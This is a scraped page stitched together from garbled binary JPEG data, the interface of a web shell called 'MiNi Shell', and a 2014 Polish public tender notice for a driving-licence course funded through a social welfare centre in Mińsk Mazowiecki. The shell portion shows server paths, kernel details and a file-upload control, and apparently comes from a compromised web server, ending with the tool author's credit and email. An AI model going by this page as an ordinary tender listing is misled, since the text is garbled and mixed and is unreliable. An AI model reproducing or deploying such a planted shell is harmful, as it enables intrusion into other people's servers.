JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140929/321308-N-2014.html

<p class="kh_header"><b>Mińsk Mazowiecki: Organizacja i przeprowadzenie kursu prawa jazdy kat. C dla uczestnika projektu Czas na aktywność w Mińsku Mazowieckim współfinansowanego ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 321308 - 2014; data zamieszczenia: 29.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Tadeusza Kościuszki 25A, 05-300 Mińsk Mazowiecki, woj. mazowieckie, tel. 25 7582224, faks 25 7582224.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.minskmaz.mops.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie kursu prawa jazdy kat. C dla uczestnika projektu Czas na aktywność w Mińsku Mazowieckim współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Prawo jazdy kat. C
Celem kursu jest uzyskanie uprawnień do prowadzenia pojazdów kategorii C.
Liczba uczestników kursu kat. C: 1 osoba. 
Wymiar godzinowy z zakresu prawa jazdy kat. C: 20 godzin zajęć teoretycznych, 30 godzin zajęć praktycznych. 
Program kursu w zakresie merytorycznym i czasowym, a także zakres posiadanych uprawnień przez osoby prowadzące kurs ma być zgodny z obowiązującymi przepisami prawa polskiego.
Przeprowadzenie niezbędnych badań lekarskich oraz badań psychotechnicznych.
Opłacenie I egzaminu państwowego teoretycznego i praktycznego dla uczestnika kursu.
Termin realizacji: od dnia podpisania umowy do 15.12.2014r.
Program szkolenia prawa jazdy musi być zgodny z obowiązującymi w tym zakresie przepisami. Czas trwania kursu zawodowego (w tym liczba godzin) powinien być realizowany zgodnie z Rozporządzeniem Ministra Transportu, Budownictwa  i Gospodarki Morskiej z dnia 13 lipca 2012 r. w sprawie egzaminowania osób ubiegających się o uprawnienia do kierowania pojazdami, szkolenia, egzaminowania i uzyskiwania uprawnień przez egzaminatorów oraz wzorów dokumentów stosowanych w tych sprawach. 
Założenia:
Uczestnikami/uczestniczkami projektu są osoby zamieszkujące na terenie miasta Mińsk Mazowieckim, korzystające ze świadczeń pomocy społecznej, nieaktywne zawodowo, zagrożone  wykluczeniem społecznym, w wieku aktywności zawodowej.
Miejsce wykonania przedmiotu zamówienia jest miasto Mińsk Mazowiecki. 
Zajęcia szkoleniowe mogą odbywać się od poniedziałku do piątku (z wyłączeniem świąt) w przedziale czasowym od godziny 8.00 do 16.00 (1 godzina zajęć szkoleniowych = 1 godzina zegarowa (60 minut), w tym 45 minut zajęć i 15 minut przerwy. Długość przerw może być ustalona w sposób elastyczny. Dopuszcza się odbywanie zajęć w innych godzinach po uzgodnieniu z uczestnikami/uczestniczkami kursu.
Szkolenia powinny być prowadzone przez wykładowców posiadających odpowiednie kwalifikacje i doświadczenie w prowadzeniu zajęć objętych przedmiotem zamówienia.
Wykonawca zobowiązany jest do zapewnienia bezpiecznych i higienicznych warunków pracy i nauki, w tym zapewnienia sal szkoleniowych, przestronnych, odpowiednio oświetlonych, klimatyzowanych lub minimum wentylowanych, dostosowanych do ilości uczestników szkolenia, odpowiednio wyposażonych 
w sprzęt dydaktyczny, np. rzutnik multimedialny, laptop, ekran, tablicę do pisania, flipchart, stoły, krzesła, spełniających wymogi bezpieczeństwa bhp i przeciwpożarowe z dostępem do pomieszczeń sanitarnych.
Wykonawca zapewnia każdemu uczestnikowi szkolenia nieodpłatnie obiad dwudaniowy (zupa + drugie danie składające się z ziemniaków, porcji mięsa, surówki i kompotu) w każdym dniu realizacji szkolenia oraz poczęstunek w formie kawy, herbaty, zimnych napojów, słodyczy. Obiad przysługuje wtedy, gdy zajęcia trwają co najmniej 6 godzin. Odbiór posiłków musi zostać pokwitowany przez uczestników szkolenia.
Wykonawca ubezpiecza uczestników/uczestniczki kursu od następstw nieszczęśliwych wypadków w trakcie kursów oraz w drodze na kurs i z kursu.
Wykonawca składa szczegółowy program kursu i przedkłada wraz z ofertą. Program musi zawierać wszelkie elementy wymienione w Rozporządzeniu Ministra Edukacji Narodowej z dnia 11.01.2012r. (Dz. U. z 2014r. poz. 622): nazwę i zakres szkolenia, czas trwania szkolenia, liczbę godzin i sposób organizacji szkolenia, wymagania wstępne dla uczestników szkolenia, cele szkolenia, plan nauczania, określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem części teoretycznej i części praktycznej, opis treści szkolenia w zakresie poszczególnych zajęć edukacyjnych, wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych, przewidziane sprawdziany i egzaminy. Wykonawca zobowiązany jest do bezpłatnego przekazania uczestnikom/uczestniczkom projektu materiałów dydaktycznych, teczkę na materiały, notes, długopis, harmonogram szkolenia. Uczestnik/uczestniczka potwierdza odbiór materiałów na podstawie listy potwierdzającej, przygotowanej przez Wykonawcę (logowanych zgodnie z wytycznymi POKL). Listę potwierdzającą odbiór materiałów Wykonawca przedkłada wraz z końcowym rachunkiem rozliczającym  usługę. Wykonawca uwzględnia jeden egzemplarz materiałów dydaktycznych dla Zamawiającego. Wykonawca zobowiązany jest do przekazania uczestnikom/uczestniczkom informacji o współfinansowaniu projektu przez Europejski Fundusz Społeczny w ramach Programu Operacyjnego Kapitał Ludzki realizowanego przez Miejski Ośrodek Pomocy Społecznej w Mińsku Mazowieckim Priorytet VII Promocja integracji społecznej, Działanie 7.1.Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej. Wykonawca ma obowiązek przeprowadzić ewaluację prowadzonego szkolenia za pomocą ankiet przed i po szkoleniu oraz przekazać dokumentację ewaluacji Zamawiającemu wraz z zestawieniem wyników i komentarzem do nich. Wykonawca zobowiązany jest do zorganizowania dla uczestników szkolenia niezbędnych badań lekarskich, książeczek zdrowia jeżeli specyfika kursu tego wymaga. Koszt przeprowadzenia badań oraz uzyskania książeczek zdrowia wkalkulowany jest w koszt szkolenia. Wykonawca zobowiązany jest do wyznaczenia osoby do kontaktu z Zamawiającym, odpowiedzialnej za dbałość o wysoką jakość zajęć i upoważnionej do podejmowania wiążących decyzji w kwestiach związanych z realizowanym kursem. Wykonawca zobowiązany jest do dokumentowania pracy poprzez: dziennik zajęć edukacyjnych zawierający tematy zajęć edukacyjnych oraz wymiar godzin, listy obecności uczestników/uczestniczek, protokół z egzaminu, jeśli został przeprowadzony, rejestr wydanych zaświadczeń potwierdzających ukończenie szkolenia zawierający numer, imię i nazwisko oraz PESEL uczestnika oraz nazwę szkolenia 
i datę wydania zaświadczenia, zdjęcia dokumentujące przebieg zajęć, które należy dostarczyć po wykonanej usłudze na płycie CD/DVD, harmonogram kursu. Wykonawca przedkłada dokumentację z przebiegu szkoleń wraz protokołem wykonania i odbioru usługi oraz z końcowym rachunkiem rozliczającym usługę. Dokumentacja ma być opatrzona w logotypy Programu Operacyjnego Kapitał Ludzki oraz logo Unii Europejskiej. Wykonawca zobowiązany jest do oznakowania miejsca przeprowadzanych szkoleń oraz wszelkich dokumentów związanych z organizacja zajęć zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. Zamawiający zastrzega sobie prawo do odbycia wizyt monitorujących w celu weryfikacji prawidłowości realizacji zamówienia. Wykonawca musi spełnić wymagania określone w niniejszej SIWZ i wymagania wynikające z ustawy prawo zamówień publicznych. Niespełnienie chociażby jednego warunku spowoduje wykluczenie Wykonawcy z postępowania. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą. Zamawiający nie zezwala na składanie ofert wariantowych i wymaga złożenia oferty zgodnej z przedmiotem zamówienia opisanym w SIWZ. Zamawiający nie przewiduje udzielania zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt.6 i 7 ustawy PZP. Zamawiający dopuszcza powierzenia zamówienia podwykonawcom.Postępowanie nie jest prowadzone w celu zawarcia umowy ramowej, ustanowienia dynamicznego systemu zakupów oraz nie przewiduje się aukcji elektronicznej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.41.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek posiadania uprawnień do organizowania i prowadzenia szkoleń objętych niniejszym zamówieniem, Zamawiający wymaga, aby wykonawca przedłożył: podpisane Oświadczenie o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ); podpisane Oświadczenie o posiadaniu wpisu do Rejestru Instytucji Szkoleniowych w Wojewódzkim Urzędzie Pracy właściwym ze względu na siedzibę instytucji   szkoleniowej (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga od wykonawcy posiadania doświadczenia w realizacji usług szkolenia w zakresie objętym zamówieniem. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę szkoleniową o tym samym lub zbliżonym zakresie tematycznym (właściwym dla każdego zadania). Ocena spełniania warunku zostanie dokonana na podstawie wykazu wykonanych usług w wyżej opisanym zakresie (załącznik nr 4 do SIWZ) i załączonych do wykazu dowodów należycie wykonanych usług w postaci listów referencyjnych, zaświadczeń o przeprowadzeniu usług, umów z potwierdzeniem należytego wykonania usług, protokołów odbioru itp. Przedłożone dokumenty muszą zawierać w szczególności datę wykonanej usługi oraz liczbę przeprowadzonych szkoleń. Ocena spełnienia warunku odbędzie się na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym zostanie uznany za spełniony, jeżeli Wykonawca będzie dysponował do realizacji szkolenia odpowiednim sprzętem i miejscem umożliwiającym realizację usługi. Ocena spełnienia warunku odbędzie się na zasadzie spełnia/nie spełnia (załącznik nr 6 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonywania zamówienia zostanie   uznany za spełniony, jeżeli Wykonawca wykaże, że kadra dydaktyczna szkolenia posiada właściwe wykształcenie, kwalifikacje i doświadczenie w zakresie wykonywanych czynności w realizacji zamówienia. Ocena spełnienia warunku odbędzie się na zasadzie spełnia/nie spełnia (załącznik nr 5 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku odbędzie się na zasadzie spełnia lub nie spełnia. Zamawiający uzna warunek za spełniony na podstawie podpisanego oświadczenia z art. 22 ustawy Pzp na podstawie załącznika nr 2.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza w uzasadnionych sytuacjach możliwość zmiany miejsca, bądź harmonogramu realizacji zamówienia. W takim przypadku Strony zobowiązują się uzgodnić nowe miejsce, bądź termin realizacji usługi. Zamawiający dopuszcza możliwość zmiany wynagrodzenia w przypadku zmniejszenia liczby uczestników - Wykonawca zobowiązany jest niezwłocznie powiadomić na piśmie Zamawiającego o zmianie liczby osób, jak również Zamawiający zobowiązany jest  niezwłocznie  powiadomić Wykonawcę o zmianie liczby osób. Zamawiający dopuszcza możliwość zmiany osób wskazanych w ofercie do realizacji zamówienia w szczególnie uzasadnionych sytuacjach. Wykonawca zobowiązany jest przedłożyć Zamawiającemu niezwłocznie dokumenty do akceptacji, osoba zastępująca musi posiadać kwalifikacje  odpowiadające kwalifikacjom osoby, którą zastępuje.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.minskmaz.mops.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej 
05-300 Mińsk Mazowiecki
ul. Kościuszki 25 A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2014 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej 
05-300 Mińsk Mazowiecki
ul. Kościuszki 25 A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Czas na aktywność w Mińsku Mazowieckim współfinansowany ze środków Unii Europejskiej w ramach  Europejskiego Funduszu Społecznego, Priorytet VII Promocja integracji społecznej, Działanie 7.1.Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej. Projekt realizowany jest w ramach 
Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com